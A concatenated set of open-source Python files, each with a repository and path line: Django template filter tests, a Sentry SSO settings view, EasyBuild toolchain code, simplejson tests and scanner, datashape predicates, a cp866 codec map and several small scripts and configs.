self.assertEqual(output, '\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>')
@setup({'unordered_list04': '{% autoescape off %}{{ a|unordered_list }}{% endautoescape %}'})
def test_unordered_list04(self):
output = self.engine.render_to_string('unordered_list04', {'a': ['x>', [mark_safe('<y')]]})
self.assertEqual(output, '\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>')
@setup({'unordered_list05': '{% autoescape off %}{{ a|unordered_list }}{% endautoescape %}'})
def test_unordered_list05(self):
output = self.engine.render_to_string('unordered_list05', {'a': ['x>', ['<y']]})
self.assertEqual(output, '\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>')
class FunctionTests(SimpleTestCase):
def test_list(self):
self.assertEqual(unordered_list(['item 1', 'item 2']), '\t<li>item 1</li>\n\t<li>item 2</li>')
def test_nested(self):
self.assertEqual(
unordered_list(['item 1', ['item 1.1']]),
'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1</li>\n\t</ul>\n\t</li>',
)
def test_nested2(self):
self.assertEqual(
unordered_list(['item 1', ['item 1.1', 'item1.2'], 'item 2']),
'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1</li>\n\t\t<li>item1.2'
'</li>\n\t</ul>\n\t</li>\n\t<li>item 2</li>',
)
def test_nested3(self):
self.assertEqual(
unordered_list(['item 1', 'item 2', ['item 2.1']]),
'\t<li>item 1</li>\n\t<li>item 2\n\t<ul>\n\t\t<li>item 2.1'
'</li>\n\t</ul>\n\t</li>',
)
def test_nested_multiple(self):
self.assertEqual(
unordered_list(['item 1', ['item 1.1', ['item 1.1.1', ['item 1.1.1.1']]]]),
'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1\n\t\t<ul>\n\t\t\t<li>'
'item 1.1.1\n\t\t\t<ul>\n\t\t\t\t<li>item 1.1.1.1</li>\n\t\t\t'
'</ul>\n\t\t\t</li>\n\t\t</ul>\n\t\t</li>\n\t</ul>\n\t</li>',
)
def test_nested_multiple2(self):
self.assertEqual(
unordered_list(['States', ['Kansas', ['Lawrence', 'Topeka'], 'Illinois']]),
'\t<li>States\n\t<ul>\n\t\t<li>Kansas\n\t\t<ul>\n\t\t\t<li>'
'Lawrence</li>\n\t\t\t<li>Topeka</li>\n\t\t</ul>\n\t\t</li>'
'\n\t\t<li>Illinois</li>\n\t</ul>\n\t</li>',
)
def test_autoescape(self):
self.assertEqual(
unordered_list(['<a>item 1</a>', 'item 2']),
'\t<li><a>item 1</a></li>\n\t<li>item 2</li>',
)
def test_autoescape_off(self):
self.assertEqual(
unordered_list(['<a>item 1</a>', 'item 2'], autoescape=False),
'\t<li><a>item 1</a></li>\n\t<li>item 2</li>',
)
def test_ulitem(self):
class ULItem:
def __init__(self, title):
self.title = title
def __str__(self):
return 'ulitem-%s' % str(self.title)
a = ULItem('a')
b = ULItem('b')
c = ULItem('<a>c</a>')
self.assertEqual(
unordered_list([a, b, c]),
'\t<li>ulitem-a</li>\n\t<li>ulitem-b</li>\n\t<li>ulitem-<a>c</a></li>',
)
def item_generator():
yield a
yield b
yield c
self.assertEqual(
unordered_list(item_generator()),
'\t<li>ulitem-a</li>\n\t<li>ulitem-b</li>\n\t<li>ulitem-<a>c</a></li>',
)
def test_ulitem_autoescape_off(self):
class ULItem:
def __init__(self, title):
self.title = title
def __str__(self):
return 'ulitem-%s' % str(self.title)
a = ULItem('a')
b = ULItem('b')
c = ULItem('<a>c</a>')
self.assertEqual(
unordered_list([a, b, c], autoescape=False),
'\t<li>ulitem-a</li>\n\t<li>ulitem-b</li>\n\t<li>ulitem-<a>c</a></li>',
)
def item_generator():
yield a
yield b
yield c
self.assertEqual(
unordered_list(item_generator(), autoescape=False),
'\t<li>ulitem-a</li>\n\t<li>ulitem-b</li>\n\t<li>ulitem-<a>c</a></li>',
)
|
ddico/odoomrp-utils
|
refs/heads/8.0
|
account_invoice_supplier_ref_required/__init__.py
|
44
|
# -*- encoding: utf-8 -*-
##############################################################################
# For copyright and license notices, see __openerp__.py file in root directory
##############################################################################
|
jokey2k/sentry
|
refs/heads/master
|
src/sentry/web/frontend/organization_auth_settings.py
|
1
|
from __future__ import absolute_import
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.db import transaction
from django.db.models import F
from django.http import HttpResponse, HttpResponseRedirect
from django.utils.translation import ugettext_lazy as _
from sentry import features
from sentry.auth import manager
from sentry.auth.helper import AuthHelper
from sentry.models import (
AuditLogEntry, AuditLogEntryEvent, AuthProvider, OrganizationMember,
OrganizationMemberType
)
from sentry.plugins import Response
from sentry.utils import db
from sentry.utils.http import absolute_uri
from sentry.web.frontend.base import OrganizationView
ERR_NO_SSO = _('The SSO feature is not enabled for this organization.')
OK_PROVIDER_DISABLED = _('SSO authentication has been disabled.')
OK_REMINDERS_SENT = _('A reminder email has been sent to members who have not yet linked their accounts.')
class OrganizationAuthSettingsView(OrganizationView):
required_access = OrganizationMemberType.OWNER
def _disable_provider(self, request, organization, auth_provider):
AuditLogEntry.objects.create(
organization=organization,
actor=request.user,
ip_address=request.META['REMOTE_ADDR'],
target_object=auth_provider.id,
event=AuditLogEntryEvent.SSO_DISABLE,
data=auth_provider.get_audit_log_data(),
)
if db.is_sqlite():
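            # On SQLite, clear the SSO flags one membership row at a time;
            # other backends take the single bitwise F() update below.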
for om in OrganizationMember.objects.filter(organization=organization):
setattr(om.flags, 'sso:linked', False)
setattr(om.flags, 'sso:invalid', False)
om.save()
else:
OrganizationMember.objects.filter(
organization=organization,
).update(
flags=F('flags').bitand(
~getattr(OrganizationMember.flags, 'sso:linked'),
).bitand(
~getattr(OrganizationMember.flags, 'sso:invalid'),
),
)
auth_provider.delete()
def _reinvite_members(self, request, organization):
member_list = OrganizationMember.objects.filter(
organization=organization,
flags=~getattr(OrganizationMember.flags, 'sso:linked'),
)
for member in member_list:
member.send_sso_link_email()
def handle_existing_provider(self, request, organization, auth_provider):
provider = auth_provider.get_provider()
if request.method == 'POST':
op = request.POST.get('op')
if op == 'disable':
self._disable_provider(request, organization, auth_provider)
messages.add_message(
request, messages.SUCCESS,
OK_PROVIDER_DISABLED,
)
next_uri = reverse('sentry-organization-auth-settings',
args=[organization.slug])
return self.redirect(next_uri)
elif op == 'reinvite':
self._reinvite_members(request, organization)
messages.add_message(
request, messages.SUCCESS,
OK_REMINDERS_SENT,
)
next_uri = reverse('sentry-organization-auth-settings',
args=[organization.slug])
return self.redirect(next_uri)
view = provider.get_configure_view()
response = view(request, organization, auth_provider)
if isinstance(response, HttpResponse):
return response
elif isinstance(response, Response):
response = response.render(request, {
'auth_provider': auth_provider,
'organization': organization,
'provider': provider,
})
pending_links_count = OrganizationMember.objects.filter(
organization=organization,
flags=~getattr(OrganizationMember.flags, 'sso:linked'),
).count()
context = {
'pending_links_count': pending_links_count,
'login_url': absolute_uri(reverse('sentry-organization-home', args=[organization.slug])),
'auth_provider': auth_provider,
'provider_name': provider.name,
'content': response,
}
return self.respond('sentry/organization-auth-provider-settings.html', context)
def handle_provider_setup(self, request, organization, provider_key):
helper = AuthHelper(
request=request,
organization=organization,
provider_key=provider_key,
flow=AuthHelper.FLOW_SETUP_PROVIDER,
)
helper.init_pipeline()
return helper.next_step()
@transaction.atomic
def handle(self, request, organization):
if not features.has('organizations:sso', organization, actor=request.user):
messages.add_message(
request, messages.ERROR,
ERR_NO_SSO,
)
return HttpResponseRedirect(reverse('sentry-organization-home', args=[organization.slug]))
try:
auth_provider = AuthProvider.objects.get(
organization=organization,
)
except AuthProvider.DoesNotExist:
pass
else:
return self.handle_existing_provider(
request=request,
organization=organization,
auth_provider=auth_provider,
)
if request.method == 'POST':
provider_key = request.POST.get('provider')
if not manager.exists(provider_key):
raise ValueError('Provider not found: {}'.format(provider_key))
# render first time setup view
return self.handle_provider_setup(request, organization, provider_key)
context = {
'provider_list': [(k, v.name) for k, v in manager],
}
return self.respond('sentry/organization-auth-settings.html', context)
|
pescobar/easybuild-framework
|
refs/heads/master
|
easybuild/toolchains/pmkl.py
|
2
|
##
# Copyright 2012-2020 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for pmkl compiler toolchain (includes PGI,
Intel Math Kernel Library (MKL), and Intel FFTW wrappers).
:author: Stijn De Weirdt (Ghent University)
:author: Kenneth Hoste (Ghent University)
:author: Bart Oldeman (McGill University, Calcul Quebec, Compute Canada)
"""
from easybuild.toolchains.pgi import PgiToolchain
from easybuild.toolchains.fft.intelfftw import IntelFFTW
from easybuild.toolchains.linalg.intelmkl import IntelMKL
class Pmkl(PgiToolchain, IntelMKL, IntelFFTW):
"""
Compiler toolchain with PGI, Intel Math Kernel Library (MKL)
and Intel FFTW wrappers.
"""
NAME = 'pmkl'
SUBTOOLCHAIN = PgiToolchain.NAME
OPTIONAL = True
|
ernestoalarcon/competitiveprogramming
|
refs/heads/master
|
quicksort1.py
|
1
|
#!/bin/python
def partition(ar):
left = []
right = []
equal = []
if len(ar) > 0:
pivot = ar[0]
for x in ar:
if x < pivot:
left.append(x)
elif x > pivot:
right.append(x)
else:
equal.append(x)
return left + equal + right
m = input()
ar = [int(i) for i in raw_input().strip().split()]
result = partition(ar)
print ' '.join(str(v) for v in result)
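# Worked example (hypothetical input): for "4 5 3 7 2" the pivot is 4,
# giving left=[3, 2], equal=[4], right=[5, 7], so the script prints
# "3 2 4 5 7" -- a single partition pass, not a full sort.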
|
anupcshan/bazel
|
refs/heads/master
|
third_party/py/gflags/tests/gflags_googletest.py
|
132
|
#!/usr/bin/env python
# Copyright (c) 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Some simple additions to the unittest framework useful for gflags testing."""
import re
import unittest
def Sorted(lst):
"""Equivalent of sorted(), but not dependent on python version."""
sorted_list = lst[:]
sorted_list.sort()
return sorted_list
def MultiLineEqual(expected, actual):
"""Returns True if expected == actual, or returns False and logs."""
if actual == expected:
return True
print "Error: FLAGS.MainModuleHelp() didn't return the expected result."
print "Got:"
print actual
print "[End of got]"
actual_lines = actual.split("\n")
expected_lines = expected.split("\n")
num_actual_lines = len(actual_lines)
num_expected_lines = len(expected_lines)
if num_actual_lines != num_expected_lines:
print "Number of actual lines = %d, expected %d" % (
num_actual_lines, num_expected_lines)
num_to_match = min(num_actual_lines, num_expected_lines)
for i in range(num_to_match):
if actual_lines[i] != expected_lines[i]:
print "One discrepancy: Got:"
print actual_lines[i]
print "Expected:"
print expected_lines[i]
break
else:
# If we got here, found no discrepancy, print first new line.
if num_actual_lines > num_expected_lines:
print "New help line:"
print actual_lines[num_expected_lines]
elif num_expected_lines > num_actual_lines:
print "Missing expected help line:"
print expected_lines[num_actual_lines]
else:
print "Bug in this test -- discrepancy detected but not found."
return False
class TestCase(unittest.TestCase):
def assertListEqual(self, list1, list2):
"""Asserts that, when sorted, list1 and list2 are identical."""
# This exists in python 2.7, but not previous versions. Use the
# built-in version if possible.
if hasattr(unittest.TestCase, "assertListEqual"):
unittest.TestCase.assertListEqual(self, Sorted(list1), Sorted(list2))
else:
self.assertEqual(Sorted(list1), Sorted(list2))
def assertMultiLineEqual(self, expected, actual):
# This exists in python 2.7, but not previous versions. Use the
# built-in version if possible.
if hasattr(unittest.TestCase, "assertMultiLineEqual"):
unittest.TestCase.assertMultiLineEqual(self, expected, actual)
else:
self.assertTrue(MultiLineEqual(expected, actual))
def assertRaisesWithRegexpMatch(self, exception, regexp, fn, *args, **kwargs):
try:
fn(*args, **kwargs)
except exception, why:
self.assertTrue(re.search(regexp, str(why)),
"'%s' does not match '%s'" % (regexp, why))
return
self.fail(exception.__name__ + " not raised")
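# Usage sketch: self.assertRaisesWithRegexpMatch(ValueError,
# "invalid literal", int, "x") checks both the exception type and that
# its message matches the regexp.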
def main():
unittest.main()
|
chemelnucfin/tensorflow
|
refs/heads/master
|
tensorflow/python/platform/logging_test.py
|
210
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
class EventLoaderTest(googletest.TestCase):
def test_log(self):
# Just check that logging works without raising an exception.
logging.error("test log message")
if __name__ == "__main__":
googletest.main()
|
popazerty/try
|
refs/heads/master
|
tools/create_picon_links.py
|
192
|
#
# create links for picon
# usage: create_picon_links lamedb
# run in picon directory.
# It will read the servicenames from the lamedb and create symlinks
# for the servicereference names.
import os, sys
f = open(sys.argv[1]).readlines()
f = f[f.index("services\n")+1:-3]
while len(f):
ref = [int(x, 0x10) for x in f[0][:-1].split(':')]
name = f[1][:-1]
name = name.replace('\xc2\x87', '').replace('\xc2\x86', '')
# SID:NS:TSID:ONID:STYPE:UNUSED(channelnumber in enigma1)
# X X X X D D
# REFTYPE:FLAGS:STYPE:SID:TSID:ONID:NS:PARENT_SID:PARENT_TSID:UNUSED
# D D X X X X X X X X
refstr = "1:0:%X:%X:%X:%X:%X:0:0:0" % (ref[4], ref[0], ref[2], ref[3], ref[1])
refstr = refstr.replace(':', '_')
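	# e.g. a ref of "1:0:19:132F:3EF:1:C00000:0:0:0" (hypothetical values)
	# turns into "1_0_19_132F_3EF_1_C00000_0_0_0", the link name used below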
filename = name + ".png"
linkname = refstr + ".png"
filename = filename.replace('/', '_').replace('\\', '_').replace('&', '_').replace('\'', '').replace('"', '').replace('`', '')
filename = filename.replace('\n', '')
for i in range(len(filename)):
if ord(filename[i]) > 127:
filename = filename[0:i] + '_' + filename[i + 1:]
if os.access(filename, os.F_OK) and not os.access(linkname, os.F_OK):
os.symlink(filename, linkname)
	elif not os.access(filename, os.F_OK):
		print "could not find %s (%s)" % (filename, name)
	f = f[3:]
|
jamesbeebop/CouchPotatoServer
|
refs/heads/master
|
libs/pyutil/test/current/json_tests/test_fail.py
|
106
|
from unittest import TestCase
from pyutil import jsonutil as json
# Fri Dec 30 18:57:26 2005
JSONDOCS = [
# http://json.org/JSON_checker/test/fail1.json
'"A JSON payload should be an object or array, not a string."',
# http://json.org/JSON_checker/test/fail2.json
'["Unclosed array"',
# http://json.org/JSON_checker/test/fail3.json
'{unquoted_key: "keys must be quoted}',
# http://json.org/JSON_checker/test/fail4.json
'["extra comma",]',
# http://json.org/JSON_checker/test/fail5.json
'["double extra comma",,]',
# http://json.org/JSON_checker/test/fail6.json
'[ , "<-- missing value"]',
# http://json.org/JSON_checker/test/fail7.json
'["Comma after the close"],',
# http://json.org/JSON_checker/test/fail8.json
'["Extra close"]]',
# http://json.org/JSON_checker/test/fail9.json
'{"Extra comma": true,}',
# http://json.org/JSON_checker/test/fail10.json
'{"Extra value after close": true} "misplaced quoted value"',
# http://json.org/JSON_checker/test/fail11.json
'{"Illegal expression": 1 + 2}',
# http://json.org/JSON_checker/test/fail12.json
'{"Illegal invocation": alert()}',
# http://json.org/JSON_checker/test/fail13.json
'{"Numbers cannot have leading zeroes": 013}',
# http://json.org/JSON_checker/test/fail14.json
'{"Numbers cannot be hex": 0x14}',
# http://json.org/JSON_checker/test/fail15.json
'["Illegal backslash escape: \\x15"]',
# http://json.org/JSON_checker/test/fail16.json
'["Illegal backslash escape: \\\'"]',
# http://json.org/JSON_checker/test/fail17.json
'["Illegal backslash escape: \\017"]',
# http://json.org/JSON_checker/test/fail18.json
'[[[[[[[[[[[[[[[[[[[["Too deep"]]]]]]]]]]]]]]]]]]]]',
# http://json.org/JSON_checker/test/fail19.json
'{"Missing colon" null}',
# http://json.org/JSON_checker/test/fail20.json
'{"Double colon":: null}',
# http://json.org/JSON_checker/test/fail21.json
'{"Comma instead of colon", null}',
# http://json.org/JSON_checker/test/fail22.json
'["Colon instead of comma": false]',
# http://json.org/JSON_checker/test/fail23.json
'["Bad value", truth]',
# http://json.org/JSON_checker/test/fail24.json
"['single quote']",
# http://code.google.com/p/simplejson/issues/detail?id=3
u'["A\u001FZ control characters in string"]',
]
SKIPS = {
1: "why not have a string payload?",
18: "spec doesn't specify any nesting limitations",
}
class TestFail(TestCase):
def test_failures(self):
for idx, doc in enumerate(JSONDOCS):
idx = idx + 1
if idx in SKIPS:
json.loads(doc)
continue
try:
json.loads(doc)
except ValueError:
pass
else:
self.fail("Expected failure for fail%d.json: %r" % (idx, doc))
|
uannight/reposan
|
refs/heads/master
|
plugin.video.tvalacarta/lib/simplejson/scanner.py
|
928
|
"""JSON token scanner
"""
import re
try:
from simplejson._speedups import make_scanner as c_make_scanner
except ImportError:
c_make_scanner = None
__all__ = ['make_scanner']
NUMBER_RE = re.compile(
r'(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?',
(re.VERBOSE | re.MULTILINE | re.DOTALL))
def py_make_scanner(context):
parse_object = context.parse_object
parse_array = context.parse_array
parse_string = context.parse_string
match_number = NUMBER_RE.match
encoding = context.encoding
strict = context.strict
parse_float = context.parse_float
parse_int = context.parse_int
parse_constant = context.parse_constant
object_hook = context.object_hook
def _scan_once(string, idx):
try:
nextchar = string[idx]
except IndexError:
raise StopIteration
if nextchar == '"':
return parse_string(string, idx + 1, encoding, strict)
elif nextchar == '{':
return parse_object((string, idx + 1), encoding, strict, _scan_once, object_hook)
elif nextchar == '[':
return parse_array((string, idx + 1), _scan_once)
elif nextchar == 'n' and string[idx:idx + 4] == 'null':
return None, idx + 4
elif nextchar == 't' and string[idx:idx + 4] == 'true':
return True, idx + 4
elif nextchar == 'f' and string[idx:idx + 5] == 'false':
return False, idx + 5
m = match_number(string, idx)
if m is not None:
integer, frac, exp = m.groups()
if frac or exp:
res = parse_float(integer + (frac or '') + (exp or ''))
else:
res = parse_int(integer)
return res, m.end()
elif nextchar == 'N' and string[idx:idx + 3] == 'NaN':
return parse_constant('NaN'), idx + 3
elif nextchar == 'I' and string[idx:idx + 8] == 'Infinity':
return parse_constant('Infinity'), idx + 8
elif nextchar == '-' and string[idx:idx + 9] == '-Infinity':
return parse_constant('-Infinity'), idx + 9
else:
raise StopIteration
return _scan_once
make_scanner = c_make_scanner or py_make_scanner
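# A quick sketch of the number tokenizer above:
#
#     >>> NUMBER_RE.match('-12.5e3').groups()
#     ('-12', '.5', 'e3')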
|
waytai/odoo
|
refs/heads/8.0
|
addons/base_geolocalize/__openerp__.py
|
211
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013_Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Partners Geo-Localization',
'version': '1.0',
'category': 'Customer Relationship Management',
'description': """
Partners geolocalization
========================
""",
'author': 'OpenERP SA',
'depends': ['crm'],
'demo': [
],
'data': [
'views/res_partner_view.xml',
],
'test': [],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
rdonnelly/ultimate-league-app
|
refs/heads/master
|
src/ultimate/index/migrations/0003_auto_20170416_2031.py
|
2
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('index', '0002_staticcontent_type'),
]
operations = [
migrations.AddField(
model_name='staticcontent',
name='created',
field=models.DateTimeField(auto_now_add=True, null=True),
),
migrations.AddField(
model_name='staticcontent',
name='updated',
field=models.DateTimeField(auto_now=True, null=True),
),
]
|
aterrel/datashape
|
refs/heads/master
|
datashape/predicates.py
|
1
|
from .util import collect, dshape
from .internal_utils import remove
from .coretypes import *
# https://github.com/ContinuumIO/datashape/blob/master/docs/source/types.rst
__all__ = ['isdimension', 'ishomogeneous', 'istabular', 'isfixed']
dimension_types = (Fixed, Var, Ellipsis)
isunit = lambda x: isinstance(x, Unit)
def isdimension(ds):
""" Is a component a dimension?
>>> isdimension(Fixed(10))
True
>>> isdimension(Var())
True
>>> isdimension(int32)
False
"""
return isinstance(ds, dimension_types)
def ishomogeneous(ds):
""" Does datashape contain only one dtype?
>>> ishomogeneous(int32)
True
>>> ishomogeneous('var * 3 * string')
True
>>> ishomogeneous('var * {name: string, amount: int}')
False
"""
ds = dshape(ds)
return len(set(remove(isdimension, collect(isunit, ds)))) == 1
def _dimensions(ds):
""" Number of dimensions of datashape
Interprets records as dimensional
>>> _dimensions(int32)
0
>>> _dimensions(10 * int32)
1
>>> _dimensions('var * 10 * int')
2
>>> _dimensions('var * {name: string, amount: int}')
2
"""
ds = dshape(ds)
if isdimension(ds[0]):
return 1 + _dimensions(ds.subarray(1))
if isinstance(ds[0], Record):
return 1 + max(map(_dimensions, ds[0].fields.values()))
if len(ds) == 1 and isunit(ds[0]):
return 0
raise NotImplementedError('Can not compute dimensions for %s' % ds)
def isfixed(ds):
""" Contains no variable dimensions
>>> isfixed('10 * int')
True
>>> isfixed('var * int')
False
>>> isfixed('10 * {name: string, amount: int}')
True
>>> isfixed('10 * {name: string, amounts: var * int}')
False
"""
ds = dshape(ds)
if isinstance(ds[0], TypeVar):
return None # don't know
if isinstance(ds[0], Var):
return False
if isinstance(ds[0], Record):
return all(map(isfixed, ds[0].fields.values()))
if len(ds) > 1:
return isfixed(ds.subarray(1))
return True
def istabular(ds):
""" Can be represented by a two dimensional with fixed columns
>>> istabular('var * 3 * int')
True
>>> istabular('var * {name: string, amount: int}')
True
>>> istabular('var * 10 * 3 * int')
False
>>> istabular('10 * var * int')
False
"""
ds = dshape(ds)
return _dimensions(ds) == 2 and isfixed(ds.subarray(1))
|
iniverno/RnR-LLC
|
refs/heads/master
|
simics-3.0-install/simics-3.0.31/amd64-linux/lib/python2.4/encodings/cp866.py
|
15
|
""" Python Character Mapping Codec generated from 'CP866.TXT' with gencodec.py.
Written by Marc-Andre Lemburg (mal@lemburg.com).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
(c) Copyright 2000 Guido van Rossum.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_map)
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return (Codec().encode,Codec().decode,StreamReader,StreamWriter)
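### Usage sketch: with the maps below, byte 0x80 decodes to U+0410
### (CYRILLIC CAPITAL LETTER A), e.g. Codec().decode('\x80') == (u'\u0410', 1)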
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x0410, # CYRILLIC CAPITAL LETTER A
0x0081: 0x0411, # CYRILLIC CAPITAL LETTER BE
0x0082: 0x0412, # CYRILLIC CAPITAL LETTER VE
0x0083: 0x0413, # CYRILLIC CAPITAL LETTER GHE
0x0084: 0x0414, # CYRILLIC CAPITAL LETTER DE
0x0085: 0x0415, # CYRILLIC CAPITAL LETTER IE
0x0086: 0x0416, # CYRILLIC CAPITAL LETTER ZHE
0x0087: 0x0417, # CYRILLIC CAPITAL LETTER ZE
0x0088: 0x0418, # CYRILLIC CAPITAL LETTER I
0x0089: 0x0419, # CYRILLIC CAPITAL LETTER SHORT I
0x008a: 0x041a, # CYRILLIC CAPITAL LETTER KA
0x008b: 0x041b, # CYRILLIC CAPITAL LETTER EL
0x008c: 0x041c, # CYRILLIC CAPITAL LETTER EM
0x008d: 0x041d, # CYRILLIC CAPITAL LETTER EN
0x008e: 0x041e, # CYRILLIC CAPITAL LETTER O
0x008f: 0x041f, # CYRILLIC CAPITAL LETTER PE
0x0090: 0x0420, # CYRILLIC CAPITAL LETTER ER
0x0091: 0x0421, # CYRILLIC CAPITAL LETTER ES
0x0092: 0x0422, # CYRILLIC CAPITAL LETTER TE
0x0093: 0x0423, # CYRILLIC CAPITAL LETTER U
0x0094: 0x0424, # CYRILLIC CAPITAL LETTER EF
0x0095: 0x0425, # CYRILLIC CAPITAL LETTER HA
0x0096: 0x0426, # CYRILLIC CAPITAL LETTER TSE
0x0097: 0x0427, # CYRILLIC CAPITAL LETTER CHE
0x0098: 0x0428, # CYRILLIC CAPITAL LETTER SHA
0x0099: 0x0429, # CYRILLIC CAPITAL LETTER SHCHA
0x009a: 0x042a, # CYRILLIC CAPITAL LETTER HARD SIGN
0x009b: 0x042b, # CYRILLIC CAPITAL LETTER YERU
0x009c: 0x042c, # CYRILLIC CAPITAL LETTER SOFT SIGN
0x009d: 0x042d, # CYRILLIC CAPITAL LETTER E
0x009e: 0x042e, # CYRILLIC CAPITAL LETTER YU
0x009f: 0x042f, # CYRILLIC CAPITAL LETTER YA
0x00a0: 0x0430, # CYRILLIC SMALL LETTER A
0x00a1: 0x0431, # CYRILLIC SMALL LETTER BE
0x00a2: 0x0432, # CYRILLIC SMALL LETTER VE
0x00a3: 0x0433, # CYRILLIC SMALL LETTER GHE
0x00a4: 0x0434, # CYRILLIC SMALL LETTER DE
0x00a5: 0x0435, # CYRILLIC SMALL LETTER IE
0x00a6: 0x0436, # CYRILLIC SMALL LETTER ZHE
0x00a7: 0x0437, # CYRILLIC SMALL LETTER ZE
0x00a8: 0x0438, # CYRILLIC SMALL LETTER I
0x00a9: 0x0439, # CYRILLIC SMALL LETTER SHORT I
0x00aa: 0x043a, # CYRILLIC SMALL LETTER KA
0x00ab: 0x043b, # CYRILLIC SMALL LETTER EL
0x00ac: 0x043c, # CYRILLIC SMALL LETTER EM
0x00ad: 0x043d, # CYRILLIC SMALL LETTER EN
0x00ae: 0x043e, # CYRILLIC SMALL LETTER O
0x00af: 0x043f, # CYRILLIC SMALL LETTER PE
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x2561, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x00b6: 0x2562, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x00b7: 0x2556, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x00b8: 0x2555, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x255c, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x00be: 0x255b, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
